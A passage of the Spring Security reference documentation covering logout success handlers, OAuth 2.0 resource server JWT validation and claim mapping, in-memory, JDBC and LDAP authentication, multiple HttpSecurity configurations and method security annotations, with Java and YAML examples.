details.\n\nInstead of providing `LogoutHandler` implementations directly, the fluent API also provides shortcuts that provide the respective `LogoutHandler` implementations under the covers.\nE.g. `deleteCookies()` allows specifying the names of one or more cookies to be removed on logout success.\nThis is a shortcut compared to adding a `CookieClearingLogoutHandler`.\n\n[[jc-logout-success-handler]]\n=== LogoutSuccessHandler\n\nThe `LogoutSuccessHandler` is called after a successful logout by the `LogoutFilter`, to handle e.g.\nredirection or forwarding to the appropriate destination.\nNote that the interface is almost the same as the `LogoutHandler` but may raise an exception.\n\nThe following implementations are provided:\n\n- {security-api-url}org\/springframework\/security\/web\/authentication\/logout\/SimpleUrlLogoutSuccessHandler.html[SimpleUrlLogoutSuccessHandler]\n- HttpStatusReturningLogoutSuccessHandler\n\nAs mentioned above, you don't need to specify the `SimpleUrlLogoutSuccessHandler` directly.\nInstead, the fluent API provides a shortcut by setting the `logoutSuccessUrl()`.\nThis will setup the `SimpleUrlLogoutSuccessHandler` under the covers.\nThe provided URL will be redirected to after a logout has occurred.\nThe default is `\/login?logout`.\n\nThe `HttpStatusReturningLogoutSuccessHandler` can be interesting in REST API type scenarios.\nInstead of redirecting to a URL upon the successful logout, this `LogoutSuccessHandler` allows you to provide a plain HTTP status code to be returned.\nIf not configured a status code 200 will be returned by default.\n\n[[jc-logout-references]]\n=== Further Logout-Related References\n\n- <<ns-logout, Logout Handling>>\n- <<test-logout, Testing Logout>>\n- <<servletapi-logout, HttpServletRequest.logout()>>\n- <<remember-me-impls>>\n- <<csrf-logout, Logging Out>> in section CSRF Caveats\n- Section <<cas-singlelogout, Single Logout>> (CAS protocol)\n- Documentation for the <<nsa-logout, logout element>> in the Spring Security XML Namespace section\n\n\ninclude::oauth2-client.adoc[]\n\ninclude::oauth2-login.adoc[]\n\n\n[[oauth2resourceserver]]\n== OAuth 2.0 Resource Server\n\nSpring Security supports protecting endpoints using https:\/\/tools.ietf.org\/html\/rfc7519[JWT]-encoded OAuth 2.0 https:\/\/tools.ietf.org\/html\/rfc6750.html[Bearer Tokens].\n\nThis is handy in circumstances where an application has federated its authority management out to an https:\/\/tools.ietf.org\/html\/rfc6749[authorization server] (for example, Okta or Ping Identity).\nThis authorization server can be consulted by Resource Servers to validate authority when serving requests.\n\n[NOTE]\n====\nA complete working example can be found in {gh-samples-url}\/boot\/oauth2resourceserver[*OAuth 2.0 Resource Server Servlet sample*].\n====\n\n=== Dependencies\n\nMost Resource Server support is collected into `spring-security-oauth2-resource-server`.\nHowever, the support for decoding and verifying JWTs is in `spring-security-oauth2-jose`, meaning that both are necessary in order to have a working resource server that supports JWT-encoded Bearer Tokens.\n\n[[oauth2resourceserver-minimalconfiguration]]\n=== Minimal Configuration\n\nWhen using https:\/\/spring.io\/projects\/spring-boot[Spring Boot], configuring an application as a resource server consists of two basic steps.\nFirst, include the needed dependencies and second, indicate the location of the authorization server.\n\n==== Specifying the Authorization Server\n\nTo specify which authorization server to use, simply do:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n issuer-uri: https:\/\/idp.example.com\n```\n\nWhere `https:\/\/idp.example.com` is the value contained in the `iss` claim for JWT tokens that the authorization server will issue.\nResource Server will use this property to further self-configure, discover the authorization server's public keys, and subsequently validate incoming JWTs.\n\n[NOTE]\nTo use the `issuer-uri` property, it must also be true that `https:\/\/idp.example.com\/.well-known\/openid-configuration` is a supported endpoint for the authorization server.\nThis endpoint is referred to as a https:\/\/openid.net\/specs\/openid-connect-discovery-1_0.html#ProviderConfig[Provider Configuration] endpoint.\n\nAnd that's it!\n\n==== Startup Expectations\n\nWhen this property and these dependencies are used, Resource Server will automatically configure itself to validate JWT-encoded Bearer Tokens.\n\nIt achieves this through a deterministic startup process:\n\n1. Hit the Provider Configuration endpoint, `https:\/\/idp.example.com\/.well-known\/openid-configuration`, processing the response for the `jwks_url` property\n2. Configure the validation strategy to query `jwks_url` for valid public keys\n3. Configure the validation strategy to validate each JWTs `iss` claim against `https:\/\/idp.example.com`.\n\nA consequence of this process is that the authorization server must be up and receiving requests in order for Resource Server to successfully start up.\n\n[NOTE]\nIf the authorization server is down when Resource Server queries it (given appropriate timeouts), then startup will fail.\n\n==== Runtime Expectations\n\nOnce the application is started up, Resource Server will attempt to process any request containing an `Authorization: Bearer` header:\n\n```http\nGET \/ HTTP\/1.1\nAuthorization: Bearer some-token-value # Resource Server will process this\n```\n\nSo long as this scheme is indicated, Resource Server will attempt to process the request according to the Bearer Token specification.\n\nGiven a well-formed JWT token, Resource Server will\n\n1. Validate its signature against a public key obtained from the `jwks_url` endpoint during startup and matched against the JWTs header\n2. Validate the JWTs `exp` and `nbf` timestamps and the JWTs `iss` claim, and\n3. Map each scope to an authority with the prefix `SCOPE_`.\n\n[NOTE]\nAs the authorization server makes available new keys, Spring Security will automatically rotate the keys used to validate the JWT tokens.\n\nThe resulting `Authentication#getPrincipal`, by default, is a Spring Security `Jwt` object, and `Authentication#getName` maps to the JWT's `sub` property, if one is present.\n\nFrom here, consider jumping to:\n\n<<oauth2resourceserver-jwkseturi,How to Configure without Tying Resource Server startup to an authorization server's availability>>\n\n<<oauth2resourceserver-sansboot,How to Configure without Spring Boot>>\n\n[[oauth2resourceserver-jwkseturi]]\n=== Specifying the Authorization Server JWK Set Uri Directly\n\nIf the authorization server doesn't support the Provider Configuration endpoint, or if Resource Server must be able to start up independently from the authorization server, then `issuer-uri` can be exchanged for `jwk-set-uri`:\n\n```yaml\nsecurity:\n oauth2:\n resourceserver:\n jwt:\n jwk-set-uri: https:\/\/idp.example.com\/.well-known\/jwks.json\n```\n\n[NOTE]\nThe JWK Set uri is not standardized, but can typically be found in the authorization server's documentation\n\nConsequently, Resource Server will not ping the authorization server at startup.\nHowever, it will also no longer validate the `iss` claim in the JWT (since Resource Server no longer knows what the issuer value should be).\n\n[NOTE]\nThis property can also be supplied directly on the <<oauth2resourceserver-jwkseturi-dsl,DSL>>.\n\n[[oauth2resourceserver-sansboot]]\n=== Overriding or Replacing Boot Auto Configuration\n\nThere are two `@Bean` s that Spring Boot generates on Resource Server's behalf.\n\nThe first is a `WebSecurityConfigurerAdapter` that configures the app as a resource server:\n\n```java\nprotected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n}\n```\n\nIf the application doesn't expose a `WebSecurityConfigurerAdapter` bean, then Spring Boot will expose the above default one.\n\nReplacing this is as simple as exposing the bean within the application:\n\n```java\n@EnableWebSecurity\npublic class MyCustomSecurityConfiguration extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_message:read\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(myConverter())\n )\n );\n }\n}\n```\n\nThe above requires the scope of `message:read` for any URL that starts with `\/messages\/`.\n\nMethods on the `oauth2ResourceServer` DSL will also override or replace auto configuration.\n\nFor example, the second `@Bean` Spring Boot creates is a `JwtDecoder`, which decodes `String` tokens into validated instances of `Jwt`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return JwtDecoders.fromOidcIssuerLocation(issuerUri);\n}\n```\n\nIf the application doesn't expose a `JwtDecoder` bean, then Spring Boot will expose the above default one.\n\nAnd its configuration can be overridden using `jwkSetUri()` or replaced using `decoder()`.\n\n[[oauth2resourceserver-jwkseturi-dsl]]\n==== Using `jwkSetUri()`\n\nAn authorization server's JWK Set Uri can be configured <<oauth2resourceserver-jwkseturi,as a configuration property>> or it can be supplied in the DSL:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwkSetUri(\"https:\/\/idp.example.com\/.well-known\/jwks.json\")\n )\n );\n }\n}\n```\n\nUsing `jwkSetUri()` takes precedence over any configuration property.\n\n[[oauth2resourceserver-decoder-dsl]]\n==== Using `decoder()`\n\nMore powerful than `jwkSetUri()` is `decoder()`, which will completely replace any Boot auto configuration of `JwtDecoder`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .decoder(myCustomDecoder())\n )\n );\n }\n}\n```\n\nThis is handy when deeper configuration, like <<oauth2resourceserver-validation,validation>>, <<oauth2resourceserver-claimsetmapping,mapping>>, or <<oauth2resourceserver-timeouts,request timeouts>>, is necessary.\n\n[[oauth2resourceserver-decoder-bean]]\n==== Exposing a `JwtDecoder` `@Bean`\n\nOr, exposing a `JwtDecoder` `@Bean` has the same effect as `decoder()`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder() {\n return new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n}\n```\n\n[[oauth2resourceserver-authorization]]\n=== Configuring Authorization\n\nA JWT that is issued from an OAuth 2.0 Authorization Server will typically either have a `scope` or `scp` attribute, indicating the scopes (or authorities) it's been granted, for example:\n\n`{ ..., \"scope\" : \"messages contacts\"}`\n\nWhen this is the case, Resource Server will attempt to coerce these scopes into a list of granted authorities, prefixing each scope with the string \"SCOPE_\".\n\nThis means that to protect an endpoint or method with a scope derived from a JWT, the corresponding expressions should include this prefix:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .mvcMatchers(\"\/contacts\/**\").hasAuthority(\"SCOPE_contacts\")\n .mvcMatchers(\"\/messages\/**\").hasAuthority(\"SCOPE_messages\")\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(withDefaults())\n );\n }\n}\n```\n\nOr similarly with method security:\n\n```java\n@PreAuthorize(\"hasAuthority('SCOPE_messages')\")\npublic List<Message> getMessages(...) {}\n```\n\n[[oauth2resourceserver-authorization-extraction]]\n==== Extracting Authorities Manually\n\nHowever, there are a number of circumstances where this default is insufficient.\nFor example, some authorization servers don't use the `scope` attribute, but instead have their own custom attribute.\nOr, at other times, the resource server may need to adapt the attribute or a composition of attributes into internalized authorities.\n\nTo this end, the DSL exposes `jwtAuthenticationConverter()`:\n\n```java\n@EnableWebSecurity\npublic class DirectlyConfiguredJwkSetUri extends WebSecurityConfigurerAdapter {\n protected void configure(HttpSecurity http) {\n http\n .authorizeRequests(authorizeRequests ->\n authorizeRequests\n .anyRequest().authenticated()\n )\n .oauth2ResourceServer(oauth2ResourceServer ->\n oauth2ResourceServer\n .jwt(jwt ->\n jwt\n .jwtAuthenticationConverter(grantedAuthoritiesExtractor())\n )\n );\n }\n}\n\nConverter<Jwt, AbstractAuthenticationToken> grantedAuthoritiesExtractor() {\n return new GrantedAuthoritiesExtractor();\n}\n```\n\nwhich is responsible for converting a `Jwt` into an `Authentication`.\n\nWe can override this quite simply to alter the way granted authorities are derived:\n\n```java\nstatic class GrantedAuthoritiesExtractor extends JwtAuthenticationConverter {\n protected Collection<GrantedAuthority> extractAuthorities(Jwt jwt) {\n Collection<String> authorities = (Collection<String>)\n jwt.getClaims().get(\"mycustomclaim\");\n\n return authorities.stream()\n .map(SimpleGrantedAuthority::new)\n .collect(Collectors.toList());\n }\n}\n```\n\nFor more flexibility, the DSL supports entirely replacing the converter with any class that implements `Converter<Jwt, AbstractAuthenticationToken>`:\n\n```java\nstatic class CustomAuthenticationConverter implements Converter<Jwt, AbstractAuthenticationToken> {\n public AbstractAuthenticationToken convert(Jwt jwt) {\n return new CustomAuthenticationToken(jwt);\n }\n}\n```\n\n[[oauth2resourceserver-validation]]\n=== Configuring Validation\n\nUsing <<oauth2resourceserver-minimalconfiguration,minimal Spring Boot configuration>>, indicating the authorization server's issuer uri, Resource Server will default to verifying the `iss` claim as well as the `exp` and `nbf` timestamp claims.\n\nIn circumstances where validation needs to be customized, Resource Server ships with two standard validators and also accepts custom `OAuth2TokenValidator` instances.\n\n[[oauth2resourceserver-validation-clockskew]]\n==== Customizing Timestamp Validation\n\nJWT's typically have a window of validity, with the start of the window indicated in the `nbf` claim and the end indicated in the `exp` claim.\n\nHowever, every server can experience clock drift, which can cause tokens to appear expired to one server, but not to another.\nThis can cause some implementation heartburn as the number of collaborating servers increases in a distributed system.\n\nResource Server uses `JwtTimestampValidator` to verify a token's validity window, and it can be configured with a `clockSkew` to alleviate the above problem:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> withClockSkew = new DelegatingOAuth2TokenValidator<>(\n new JwtTimestampValidator(Duration.ofSeconds(60)),\n new IssuerValidator(issuerUri));\n\n jwtDecoder.setJwtValidator(withClockSkew);\n\n return jwtDecoder;\n}\n```\n\n[NOTE]\nBy default, Resource Server configures a clock skew of 30 seconds.\n\n[[oauth2resourceserver-validation-custom]]\n==== Configuring a Custom Validator\n\nAdding a check for the `aud` claim is simple with the `OAuth2TokenValidator` API:\n\n```java\npublic class AudienceValidator implements OAuth2TokenValidator<Jwt> {\n OAuth2Error error = new OAuth2Error(\"invalid_token\", \"The required audience is missing\", null);\n\n public OAuth2TokenValidatorResult validate(Jwt jwt) {\n if (jwt.getAudience().contains(\"messaging\")) {\n return OAuth2TokenValidatorResult.success();\n } else {\n return OAuth2TokenValidatorResult.failure(error);\n }\n }\n}\n```\n\nThen, to add into a resource server, it's a matter of specifying the `JwtDecoder` instance:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = (NimbusJwtDecoder)\n JwtDecoders.fromOidcIssuerLocation(issuerUri);\n\n OAuth2TokenValidator<Jwt> audienceValidator = new AudienceValidator();\n OAuth2TokenValidator<Jwt> withIssuer = JwtValidators.createDefaultWithIssuer(issuerUri);\n OAuth2TokenValidator<Jwt> withAudience = new DelegatingOAuth2TokenValidator<>(withIssuer, audienceValidator);\n\n jwtDecoder.setJwtValidator(withAudience);\n\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-claimsetmapping]]\n=== Configuring Claim Set Mapping\n\nSpring Security uses the https:\/\/bitbucket.org\/connect2id\/nimbus-jose-jwt\/wiki\/Home[Nimbus] library for parsing JWTs and validating their signatures.\nConsequently, Spring Security is subject to Nimbus's interpretation of each field value and how to coerce each into a Java type.\n\nFor example, because Nimbus remains Java 7 compatible, it doesn't use `Instant` to represent timestamp fields.\n\nAnd it's entirely possible to use a different library or for JWT processing, which may make its own coercion decisions that need adjustment.\n\nOr, quite simply, a resource server may want to add or remove claims from a JWT for domain-specific reasons.\n\nFor these purposes, Resource Server supports mapping the JWT claim set with `MappedJwtClaimSetConverter`.\n\n[[oauth2resourceserver-claimsetmapping-singleclaim]]\n==== Customizing the Conversion of a Single Claim\n\nBy default, `MappedJwtClaimSetConverter` will attempt to coerce claims into the following types:\n\n|============\n| Claim | Java Type\n| `aud` | `Collection<String>`\n| `exp` | `Instant`\n| `iat` | `Instant`\n| `iss` | `String`\n| `jti` | `String`\n| `nbf` | `Instant`\n| `sub` | `String`\n|============\n\nAn individual claim's conversion strategy can be configured using `MappedJwtClaimSetConverter.withDefaults`:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n\n MappedJwtClaimSetConverter converter = MappedJwtClaimSetConverter\n .withDefaults(Collections.singletonMap(\"sub\", this::lookupUserIdBySub));\n jwtDecoder.setClaimSetConverter(converter);\n\n return jwtDecoder;\n}\n```\nThis will keep all the defaults, except it will override the default claim converter for `sub`.\n\n[[oauth2resourceserver-claimsetmapping-add]]\n==== Adding a Claim\n\n`MappedJwtClaimSetConverter` can also be used to add a custom claim, for example, to adapt to an existing system:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"custom\", custom -> \"value\"));\n```\n\n[[oauth2resourceserver-claimsetmapping-remove]]\n==== Removing a Claim\n\nAnd removing a claim is also simple, using the same API:\n\n```java\nMappedJwtClaimSetConverter.withDefaults(Collections.singletonMap(\"legacyclaim\", legacy -> null));\n```\n\n[[oauth2resourceserver-claimsetmapping-rename]]\n==== Renaming a Claim\n\nIn more sophisticated scenarios, like consulting multiple claims at once or renaming a claim, Resource Server accepts any class that implements `Converter<Map<String, Object>, Map<String,Object>>`:\n\n```java\npublic class UsernameSubClaimAdapter implements Converter<Map<String, Object>, Map<String, Object>> {\n private final MappedJwtClaimSetConverter delegate =\n MappedJwtClaimSetConverter.withDefaults(Collections.emptyMap());\n\n public Map<String, Object> convert(Map<String, Object> claims) {\n Map<String, Object> convertedClaims = this.delegate.convert(claims);\n\n String username = (String) convertedClaims.get(\"user_name\");\n convertedClaims.put(\"sub\", username);\n\n return convertedClaims;\n }\n}\n```\n\nAnd then, the instance can be supplied like normal:\n\n```java\n@Bean\nJwtDecoder jwtDecoder() {\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).build());\n jwtDecoder.setClaimSetConverter(new UsernameSubClaimAdapter());\n return jwtDecoder;\n}\n```\n\n[[oauth2resourceserver-timeouts]]\n=== Configuring Timeouts\n\nBy default, Resource Server uses connection and socket timeouts of 30 seconds each for coordinating with the authorization server.\n\nThis may be too short in some scenarios.\nFurther, it doesn't take into account more sophisticated patterns like back-off and discovery.\n\nTo adjust the way in which Resource Server connects to the authorization server, `NimbusJwtDecoder` accepts an instance of `RestOperations`:\n\n```java\n@Bean\npublic JwtDecoder jwtDecoder(RestTemplateBuilder builder) {\n RestOperations rest = builder\n .setConnectionTimeout(60000)\n .setReadTimeout(60000)\n .build();\n\n NimbusJwtDecoder jwtDecoder = new NimbusJwtDecoder(JwtProcessors.withJwkSetUri(jwkSetUri).restOperations(rest).build());\n return jwtDecoder;\n}\n```\n\n[[jc-authentication]]\n== Authentication\n\nThus far we have only taken a look at the most basic authentication configuration.\nLet's take a look at a few slightly more advanced options for configuring authentication.\n\n[[jc-authentication-inmemory]]\n=== In-Memory Authentication\n\nWe have already seen an example of configuring in-memory authentication for a single user.\nBelow is an example to configure multiple users:\n\n[source,java]\n----\n@Bean\npublic UserDetailsService userDetailsService() throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\treturn manager;\n}\n----\n\n[[jc-authentication-jdbc]]\n=== JDBC Authentication\n\nYou can find the updates to support JDBC based authentication.\nThe example below assumes that you have already defined a `DataSource` within your application.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/jdbc[jdbc-javaconfig] sample provides a complete example of using JDBC based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\/\/ ensure the passwords are encoded properly\n\tUserBuilder users = User.withDefaultPasswordEncoder();\n\tauth\n\t\t.jdbcAuthentication()\n\t\t\t.dataSource(dataSource)\n\t\t\t.withDefaultSchema()\n\t\t\t.withUser(users.username(\"user\").password(\"password\").roles(\"USER\"))\n\t\t\t.withUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\"));\n}\n----\n\n=== LDAP Authentication\n\nYou can find the updates to support LDAP based authentication.\nThe https:\/\/github.com\/spring-projects\/spring-security\/tree\/master\/samples\/javaconfig\/ldap[ldap-javaconfig] sample provides a complete example of using LDAP based authentication.\n\n[source,java]\n----\n@Autowired\nprivate DataSource dataSource;\n\n@Autowired\npublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\tauth\n\t\t.ldapAuthentication()\n\t\t\t.userDnPatterns(\"uid={0},ou=people\")\n\t\t\t.groupSearchBase(\"ou=groups\");\n}\n----\n\nThe example above uses the following LDIF and an embedded Apache DS LDAP instance.\n\n.users.ldif\n----\ndn: ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: groups\n\ndn: ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: organizationalUnit\nou: people\n\ndn: uid=admin,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Rod Johnson\nsn: Johnson\nuid: admin\nuserPassword: password\n\ndn: uid=user,ou=people,dc=springframework,dc=org\nobjectclass: top\nobjectclass: person\nobjectclass: organizationalPerson\nobjectclass: inetOrgPerson\ncn: Dianne Emu\nsn: Emu\nuid: user\nuserPassword: password\n\ndn: cn=user,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: user\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\nuniqueMember: uid=user,ou=people,dc=springframework,dc=org\n\ndn: cn=admin,ou=groups,dc=springframework,dc=org\nobjectclass: top\nobjectclass: groupOfNames\ncn: admin\nuniqueMember: uid=admin,ou=people,dc=springframework,dc=org\n----\n\n[[jc-authentication-authenticationprovider]]\n=== AuthenticationProvider\n\nYou can define custom authentication by exposing a custom `AuthenticationProvider` as a bean.\nFor example, the following will customize authentication assuming that `SpringAuthenticationProvider` implements `AuthenticationProvider`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated\n\n[source,java]\n----\n@Bean\npublic SpringAuthenticationProvider springAuthenticationProvider() {\n\treturn new SpringAuthenticationProvider();\n}\n----\n\n[[jc-authentication-userdetailsservice]]\n=== UserDetailsService\n\nYou can define custom authentication by exposing a custom `UserDetailsService` as a bean.\nFor example, the following will customize authentication assuming that `SpringDataUserDetailsService` implements `UserDetailsService`:\n\nNOTE: This is only used if the `AuthenticationManagerBuilder` has not been populated and no `AuthenticationProviderBean` is defined.\n\n[source,java]\n----\n@Bean\npublic SpringDataUserDetailsService springDataUserDetailsService() {\n\treturn new SpringDataUserDetailsService();\n}\n----\n\nYou can also customize how passwords are encoded by exposing a `PasswordEncoder` as a bean.\nFor example, if you use bcrypt you can add a bean definition as shown below:\n\n[source,java]\n----\n@Bean\npublic BCryptPasswordEncoder passwordEncoder() {\n\treturn new BCryptPasswordEncoder();\n}\n----\n\n== Multiple HttpSecurity\n\nWe can configure multiple HttpSecurity instances just as we can have multiple `<http>` blocks.\nThe key is to extend the `WebSecurityConfigurerAdapter` multiple times.\nFor example, the following is an example of having a different configuration for URL's that start with `\/api\/`.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class MultiHttpSecurityConfig {\n\t@Bean <1>\n\tpublic UserDetailsService userDetailsService() throws Exception {\n\t\t\/\/ ensure the passwords are encoded properly\n\t\tUserBuilder users = User.withDefaultPasswordEncoder();\n\t\tInMemoryUserDetailsManager manager = new InMemoryUserDetailsManager();\n\t\tmanager.createUser(users.username(\"user\").password(\"password\").roles(\"USER\").build());\n\t\tmanager.createUser(users.username(\"admin\").password(\"password\").roles(\"USER\",\"ADMIN\").build());\n\t\treturn manager;\n\t}\n\n\t@Configuration\n\t@Order(1) <2>\n\tpublic static class ApiWebSecurityConfigurationAdapter extends WebSecurityConfigurerAdapter {\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.antMatcher(\"\/api\/**\") <3>\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().hasRole(\"ADMIN\")\n\t\t\t )\n\t\t\t\t.httpBasic(withDefaults());\n\t\t}\n\t}\n\n\t@Configuration <4>\n\tpublic static class FormLoginWebSecurityConfigurerAdapter extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\thttp\n\t\t\t\t.authorizeRequests(authorizeRequests ->\n\t\t\t\t authorizeRequests\n\t\t\t\t\t .anyRequest().authenticated()\n\t\t\t\t)\n\t\t\t\t.formLogin(withDefaults());\n\t\t}\n\t}\n}\n----\n\n<1> Configure Authentication as normal\n<2> Create an instance of `WebSecurityConfigurerAdapter` that contains `@Order` to specify which `WebSecurityConfigurerAdapter` should be considered first.\n<3> The `http.antMatcher` states that this `HttpSecurity` will only be applicable to URLs that start with `\/api\/`\n<4> Create another instance of `WebSecurityConfigurerAdapter`.\nIf the URL does not start with `\/api\/` this configuration will be used.\nThis configuration is considered after `ApiWebSecurityConfigurationAdapter` since it has an `@Order` value after `1` (no `@Order` defaults to last).\n\n\n[[jc-method]]\n== Method Security\n\nFrom version 2.0 onwards Spring Security has improved support substantially for adding security to your service layer methods.\nIt provides support for JSR-250 annotation security as well as the framework's original `@Secured` annotation.\nFrom 3.0 you can also make use of new <<el-access,expression-based annotations>>.\nYou can apply security to a single bean, using the `intercept-methods` element to decorate the bean declaration, or you can secure multiple beans across the entire service layer using the AspectJ style pointcuts.\n\n=== EnableGlobalMethodSecurity\n\nWe can enable annotation-based security using the `@EnableGlobalMethodSecurity` annotation on any `@Configuration` instance.\nFor example, the following would enable Spring Security's `@Secured` annotation.\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(securedEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nAdding an annotation to a method (on a class or interface) would then limit the access to that method accordingly.\nSpring Security's native annotation support defines a set of attributes for the method.\nThese will be passed to the AccessDecisionManager for it to make the actual decision:\n\n[source,java]\n----\npublic interface BankService {\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account readAccount(Long id);\n\n@Secured(\"IS_AUTHENTICATED_ANONYMOUSLY\")\npublic Account[] findAccounts();\n\n@Secured(\"ROLE_TELLER\")\npublic Account post(Account account, double amount);\n}\n----\n\nSupport for JSR-250 annotations can be enabled using\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(jsr250Enabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nThese are standards-based and allow simple role-based constraints to be applied but do not have the power Spring Security's native annotations.\nTo use the new expression-based syntax, you would use\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig {\n\/\/ ...\n}\n----\n\nand the equivalent Java code would be\n\n[source,java]\n----\npublic interface BankService {\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account readAccount(Long id);\n\n@PreAuthorize(\"isAnonymous()\")\npublic Account[] findAccounts();\n\n@PreAuthorize(\"hasAuthority('ROLE_TELLER')\")\npublic Account post(Account account, double amount);\n}\n----\n\n=== GlobalMethodSecurityConfiguration\n\nSometimes you may need to perform operations that are more complicated than are possible with the `@EnableGlobalMethodSecurity` annotation allow.\nFor these instances, you can extend the `GlobalMethodSecurityConfiguration` ensuring that the `@EnableGlobalMethodSecurity` annotation is present on your subclass.\nFor example, if you wanted to provide a custom `MethodSecurityExpressionHandler`, you could use the following configuration:\n\n[source,java]\n----\n@EnableGlobalMethodSecurity(prePostEnabled = true)\npublic class MethodSecurityConfig extends GlobalMethodSecurityConfiguration {\n\t@Override\n\tprotected MethodSecurityExpressionHandler createExpressionHandler() {\n\t\t\/\/ ... create and return custom MethodSecurityExpressionHandler ...\n\t\treturn expressionHandler;\n\t}\n}\n----\n\nFor additional information about methods that can be overridden, refer to the `GlobalMethodSecurityConfiguration` Javadoc.\n\n== Post Processing Configured Objects\n\nSpring Security's Java Configuration does not expose every property of every object that it configures.\nThis simplifies the configuration for a majority of users.\nAfterall, if every property was exposed, users could use standard bean configuration.\n\nWhile there are good reasons to not directly expose every property, users may still need more advanced configuration options.\nTo address this Spring Security introduces the concept of an `ObjectPostProcessor` which can be used to modify or replace many of the Object instances created by the Java Configuration.\nFor example, if you wanted to configure the `filterSecurityPublishAuthorizationSuccess` property on `FilterSecurityInterceptor` you could use the following:\n\n[source,java]\n----\n@Override\nprotected void configure(HttpSecurity http) throws Exception {\n\thttp\n\t\t.authorizeRequests(authorizeRequests ->\n\t\t\tauthorizeRequests\n\t\t\t\t.anyRequest().authenticated()\n\t\t\t\t.withObjectPostProcessor(new ObjectPostProcessor<FilterSecurityInterceptor>() {\n\t\t\t\t\tpublic <O extends FilterSecurityInterceptor> O postProcess(\n\t\t\t\t\t\t\tO fsi) {\n\t\t\t\t\t\tfsi.setPublishAuthorizationSuccess(true);\n\t\t\t\t\t\treturn fsi;\n\t\t\t\t\t}\n\t\t\t\t})\n\t\t);\n}\n----\n\n[[jc-custom-dsls]]\n== Custom DSLs\n\nYou can provide your own custom DSLs in Spring Security.\nFor example, you might have something that looks like this:\n\n[source,java]\n----\npublic class MyCustomDsl extends AbstractHttpConfigurer<MyCustomDsl, HttpSecurity> {\n\tprivate boolean flag;\n\n\t@Override\n\tpublic void init(H http) throws Exception {\n\t\t\/\/ any method that adds another configurer\n\t\t\/\/ must be done in 